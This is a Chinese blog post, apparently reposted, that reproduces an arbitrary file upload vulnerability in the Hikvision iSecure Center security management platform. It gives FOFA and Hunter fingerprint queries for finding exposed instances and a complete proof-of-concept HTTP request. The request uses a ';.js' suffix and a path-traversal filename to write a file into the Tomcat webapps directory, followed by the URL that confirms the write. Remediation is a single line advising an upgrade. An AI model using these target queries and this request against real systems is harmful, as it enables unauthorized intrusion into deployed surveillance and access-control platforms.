热门标签
热门文章
- 1机器学习算法与Python实践之(七)逻辑回归(Logistic Regression)
- 2决策边界 逻辑回归中的多项式特征 多分类问题_多类别逻辑回归决策边界
- 3git 强制拉取远程分支和强制提交本地分支_git 强制提交
- 4【机器学习案例】不同的模型算法对鸢尾花数据集进行分类_鸢尾花数据集数据分类
- 5哈希表, 二叉树,红黑树,B Tree B+Tree B*Tree_哈希表 二叉树 红黑树 b树
- 6大数据分析与机器学习:技术深度与实例解析【上进小菜猪大数据系列】_机器学习 与大数据
- 7C#基础之多线程与异步_c#异步和多线程使用场景
- 8on windows in superset sql lab error "module object has no attribute sigalrm"
- 9当「软件研发」遇上 AI 大模型
- 10anaconda安装后没有python_python – 安装了Anaconda但无法启动Navigator
当前位置: article > 正文
海康威视isecure center 综合安防管理平台文件上传漏洞复现_综合安防漏洞
作者:凡人多烦事01 | 2024-05-04 19:31:08
赞
踩
综合安防漏洞
1.简介
工作发现,海康威视isecure center存在文件上传漏洞,该漏洞是由于海康威视isecure center存在不严谨,可能导致存在任意文件上传漏洞。
2.资产测绘
鹰图:
web.icon=="4209fe52e5c15345d0a1250f68a14d1e"
fofa:
icon_hash=“-808437027”
app=“HIKVISION-iSecure-Center”
3.poc
POST /center/api/files;.js HTTP/1.1
Host: you-ip
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream
123123
--e54e7e5834c8c50e92189959fe7227a4--
访问/clusterMgr/2BT5AV96QW.txt;.js
4.修复建议
升级至最新版。。。。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/凡人多烦事01/article/detail/535810
推荐阅读
相关标签
